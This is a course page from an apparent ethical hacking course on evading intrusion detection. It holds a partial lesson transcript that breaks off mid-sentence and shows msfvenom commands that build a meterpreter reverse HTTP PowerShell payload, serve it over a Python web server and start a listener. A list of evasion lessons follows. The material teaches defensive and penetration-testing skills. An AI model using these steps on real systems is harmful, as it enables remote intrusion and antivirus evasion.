From the course: Ethical Hacking: Evading IDS, Firewalls, and Honeypots
Unlock the full course today
Join today to access over 22,600 courses taught by industry experts or purchase this course individually.
Fileless attacks with PowerShell
From the course: Ethical Hacking: Evading IDS, Firewalls, and Honeypots
Fileless attacks with PowerShell
- [Instructor] Fileless malware is the term used to describe an attack technique that runs without writing any malware to disk. By doing this, it avoids the risk of being detected by a file scan. PowerShell can be used to execute scripts directly in memory and is a popular choice for fileless attacks. An example of this is the PowerShell download string method, which downloads content from a remote location to a buffer in memory. First of all, let's create a PowerShell script payload. msfvenom -p windows/x64 /meterpreter_reverse_http and we'll make it PSH format. We'll set LHOST=10.0.2.12 for our IP address. LPORT=80 for HTTP and we'll output the file to m64.ps1 as a PowerScript shell. Okay, we now need to serve this on a website. So let's use our Python simple HTTP server. Python -M SimpleHTTPServer. Now we need to set up a meterpreter listener for PowerShell. So in our second terminal, we'll run sudo msfconsole,…
Practice while you learn with exercise files
Download the files the instructor uses to teach the course. Follow along and learn by watching, listening and practicing.
Contents
-
-
-
-
-
-
-
-
Evading antivirus detection1m 24s
-
Exotic scanning with Nmap4m 36s
-
Obfuscating payloads with msfvenom2m 9s
-
Hiding payloads in benign files4m 34s
-
Custom packaging of software1m 2s
-
Fileless attacks with PowerShell4m 38s
-
Hiding with the cloak of invisibility1m 42s
-
Embedding malware in an alternate data stream4m 6s
-
Tunneling through DNS with iodine2m 44s
-
Checking for oversight1m 21s
-
-